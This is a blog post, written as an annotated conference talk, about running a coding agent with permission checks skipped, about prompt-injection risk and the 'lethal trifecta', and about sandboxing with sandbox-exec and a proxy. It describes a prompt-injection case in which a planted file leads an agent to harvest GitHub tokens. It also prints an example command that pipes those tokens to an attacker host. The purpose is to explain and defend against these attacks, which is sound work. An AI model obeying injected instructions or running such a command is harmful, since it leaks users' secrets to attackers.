Coding agents: weighing freedom against risk

This article explores how to balance maximizing the effectiveness of powerful AI coding assistants against guarding their potential risks. The author shares the striking results of using Claude Code in "YOLO mode" (i.e. skipping permission checks), such as completing complex projects autonomously. But he also spells out the serious challenges this mode brings, in particular "prompt injection" attacks and the "lethal trifecta" (private data, untrusted content, external communication) that can lead to serious data leaks. The article argues that sandboxing is the fundamental way to address these risks, describes how tools such as `sandbox-exec` can provide a secure coding environment, and encourages readers to explore AI's potential boldly, provided they do so safely.

🚀 **Highly productive development in "YOLO mode":** The author details the enormous efficiency gains from using Claude Code in "YOLO mode" (i.e. `--dangerously-skip-permissions`). By letting the AI operate in an almost unrestricted environment, he was able to complete several complex projects on his own in a short time, such as deploying the DeepSeek-OCR model on an NVIDIA Spark and running Python code in a WebAssembly sandbox. This mode turns the AI from a tool that demands frequent intervention into an assistant that can solve hard problems autonomously, letting the user juggle multiple tasks at once and dramatically extending what they can get done.

⚠️ **The risks of "prompt injection" and the "lethal trifecta":** The author digs into the serious security hazards that come with "YOLO mode". The core problem is "prompt injection" attacks, in which malicious input tricks the AI into taking unintended actions. When an AI simultaneously has access to private data, processes untrusted content, and can communicate externally, this forms the "lethal trifecta", which attackers can exploit to steal sensitive information such as API keys. The article stresses that any entity able to inject tokens into the AI's context should be treated as having full control over the AI's behavior.

🛡️ **Sandboxing is the key security strategy:** The article makes clear that relying on the AI itself to detect attacks is unreliable; the only viable security solution is to run AI agents in a sandbox. The ideal sandbox is a service running on someone else's computer, minimizing the blast radius for your own environment. The author recommends several sandboxing options, including cloud AI services (such as OpenAI Codex Cloud and Claude Code for the web) as well as local code-interpreter features. In particular, macOS's `sandbox-exec` command, combined with an HTTP proxy to control network connections, is presented as an effective way to govern file access and network communication and to block data exfiltration.

Living dangerously with Claude

22nd October 2025

I gave a talk last night at Claude Code Anonymous in San Francisco, the unofficial meetup for coding agent enthusiasts. I decided to talk about a dichotomy I’ve been struggling with recently. On the one hand I’m getting enormous value from running coding agents with as few restrictions as possible. On the other hand I’m deeply concerned by the risks that accompany that freedom.

Below is a copy of my slides, plus additional notes and links as an annotated presentation.

#

I’m going to be talking about two things this evening...

#

Why you should always use --dangerously-skip-permissions. (This got a cheer from the room full of Claude Code enthusiasts.)

#

And why you should never use --dangerously-skip-permissions. (This did not get a cheer.)

#

--dangerously-skip-permissions is a bit of a mouthful, so I’m going to use its better name, “YOLO mode”, for the rest of this presentation.
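In concrete terms, that just means launching the CLI with the flag attached:

```
# Default Claude Code: prompts you to approve edits and shell commands
claude

# YOLO mode: skips every permission prompt (ideally inside a sandbox)
claude --dangerously-skip-permissions
```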

Claude Code running in this mode genuinely feels like a completely different product from regular, default Claude Code.

The default mode requires you to pay constant attention to it, tracking everything it does and actively approving changes and actions every few steps.

In YOLO mode you can leave Claude alone to solve all manner of hairy problems while you go and do something else entirely.

I have a suspicion that many people who don’t appreciate the value of coding agents have never experienced YOLO mode in all of its glory.

I’ll show you three projects I completed with YOLO mode in just the past 48 hours.

#

I wrote about this one at length in Getting DeepSeek-OCR working on an NVIDIA Spark via brute force using Claude Code.

I wanted to try the newly released DeepSeek-OCR model on an NVIDIA Spark, but doing so requires figuring out how to run a model using PyTorch and CUDA, which is never easy and is a whole lot harder on an ARM64 device.

I SSHd into the Spark, started a fresh Docker container and told Claude Code to figure it out. It took 40 minutes and three additional prompts but it solved the problem, and I got to have breakfast and tinker with some other projects while it was working.
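Roughly, the shape of that session (the container image name below is a placeholder, not necessarily the one used):

```
# SSH into the Spark, then start a disposable container so the agent
# can't damage the host system (image name is a placeholder):
ssh spark
docker run -it --rm --gpus=all <some-arm64-pytorch-image> bash

# Inside the container, turn Claude Code loose on the problem:
claude --dangerously-skip-permissions
```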

#

This project started out in Claude Code for the web. I’m eternally interested in options for running Python code inside a WebAssembly sandbox, for all kinds of reasons. I decided to see if the Claude iPhone app could launch a task to figure it out.

This time I wanted to see how hard it would be to do that using Pyodide running directly in Node.js.

Claude Code got it working and built and tested this demo script showing how to do it.
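The core trick is small enough to sketch here. This isn't the demo script itself, just a minimal illustration of Pyodide's documented Node.js usage:

```
npm install pyodide

node --input-type=module -e '
import { loadPyodide } from "pyodide";

// Boot the Pyodide runtime directly in Node.js (no browser involved)
const pyodide = await loadPyodide();

// Execute Python inside the WebAssembly sandbox and print the result
console.log(pyodide.runPython("sum(i * i for i in range(10))"));
'
```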

I started a new simonw/research repository to store the results of these experiments, each one in a separate folder. It’s up to 5 completed research projects already and I created it less than 2 days ago.

#

Here’s my favorite, a project from just this morning.

I decided I wanted to try out SLOCCount, a 2001-era Perl tool for counting lines of code and estimating the cost to develop them using 2001 USA developer salaries.

...but I didn’t want to run Perl, so I decided to have Claude Code (for web, and later on my laptop) try and figure out how to run Perl scripts in WebAssembly.

TLDR: it got there in the end! It turned out some of the supporting scripts in SLOCCount were written in C, so it had to compile those to WebAssembly as well.

And now tools.simonwillison.net/sloccount is a browser-based app which runs 25-year-old Perl+C in WebAssembly against pasted code, GitHub repository references and even zip files full of code.

#

The wild thing is that all three of these projects weren’t even a priority for me—they were side quests, representing pure curiosity that I could outsource to Claude Code and solve in the background while I was occupied with something else.

I got a lot of useful work done in parallel to these three flights of fancy.

#

But there’s a reason --dangerously-skip-permissions has that scary name. It’s dangerous to use Claude Code (and other coding agents) in this way!

#

The reason for this is prompt injection, a term I coined three years ago to describe a class of attacks against LLMs that take advantage of the way untrusted content is concatenated together with trusted instructions.

(It’s named after SQL injection which shares a similar shape.)

This remains an incredibly common vulnerability.

#

Here’s a great example of a prompt injection attack against a coding agent, described by Johann Rehberger as part of his Month of AI Bugs, sharing a new prompt injection report every day for the month of August.

If a coding agent—in this case OpenHands—reads this env.html file it can be tricked into grepping the available environment variables for ghp_ (matching GitHub Personal Access Tokens) and sending the results to the attacker’s external server for “help debugging these variables”.
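Reduced to a sketch, the effect of the injection is something like this (the attacker URL is a placeholder, and the exact wording of the injected instructions varies):

```
# What the injected "please help debug these variables" instructions
# boil down to: grep the environment for GitHub tokens, then POST
# them to a server the attacker controls (placeholder URL):
env | grep ghp_ | curl --data-binary @- https://attacker.example/collect
```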

#

I coined another term to try and describe a common subset of prompt injection attacks: the lethal trifecta.

Any time an LLM system combines access to private data with exposure to untrusted content and the ability to externally communicate, there’s an opportunity for attackers to trick the system into leaking that private data back to them.

These attacks are incredibly common. If you’re running YOLO coding agents with access to private source code or secrets (like API keys in environment variables) you need to be concerned about the potential of these attacks.

#

This is the fundamental rule of prompt injection: anyone who can get their tokens into your context should be considered to have full control over what your agent does next, including the tools that it calls.

#

Some people will try to convince you that prompt injection attacks can be solved using more AI to detect the attacks. This does not work 100% reliably, which means it’s not a useful security defense at all.

The only solution that’s credible is to run coding agents in a sandbox.

#

The best sandboxes are the ones that run on someone else’s computer! That way the worst that can happen is someone else’s computer getting owned.

You still need to worry about your source code getting leaked. Most of my stuff is open source anyway, and a lot of the code I have agents working on is research code with no proprietary secrets.

If your code really is sensitive you need to consider network restrictions more carefully, as discussed a few slides from now.

#

There are lots of great sandboxes that run on other people’s computers. OpenAI Codex Cloud, Claude Code for the web, Gemini Jules are all excellent solutions for this.

I also really like the code interpreter features baked into the ChatGPT and Claude consumer apps.

#

There are two problems to consider with sandboxing.

The first is easy: you need to control what files can be read and written on the filesystem.

The second is much harder: controlling the network connections that can be made by code running inside the agent.

#

The reason network access is so important is that it represents the data exfiltration leg of the lethal trifecta. If you can prevent external communication back to an attacker they can’t steal your private information, even if they manage to sneak in their own malicious instructions.

#

Claude Code CLI grew a new sandboxing feature just yesterday, and Anthropic released a new open source library showing how it works.

#

The key to the implementation—at least on macOS—is Apple’s little-known but powerful sandbox-exec command.

This provides a way to run any command in a sandbox configured by a policy document.

Those policies can control which files are visible but can also allow-list network connections. Anthropic run an HTTP proxy and allow the Claude Code environment to talk to that, then use the proxy to control which domains it can communicate with.

(I used Claude itself to synthesize this example from Anthropic’s codebase.)
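That slide isn’t reproduced here, but to give a flavor: a minimal policy in the same spirit might look something like the sketch below. This is an illustrative approximation, not Anthropic’s actual profile—sandbox-exec’s policy language is only loosely documented, and a real profile needs many more allowances to be usable (the paths and proxy port are placeholders):

```
;; Deny everything by default, then allow-list what the agent needs.
(version 1)
(deny default)
(allow process-exec*)
(allow process-fork)
;; File access limited to the project directory (placeholder path):
(allow file-read* (subpath "/Users/me/project"))
(allow file-write* (subpath "/Users/me/project"))
;; Network access only to the local allow-listing HTTP proxy:
(allow network-outbound (remote tcp "localhost:8888"))
```

The agent is then pointed at the proxy, which enforces the domain allow-list:

```
HTTPS_PROXY=http://localhost:8888 sandbox-exec -f policy.sb \
  claude --dangerously-skip-permissions
```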

#

... the bad news is that sandbox-exec has been marked as deprecated in Apple’s documentation since at least 2017!

It’s used by Codex CLI too, and is still the most convenient way to run a sandbox on a Mac. I’m hoping Apple will reconsider.

#

So go forth and live dangerously!

(But do it in a sandbox.)
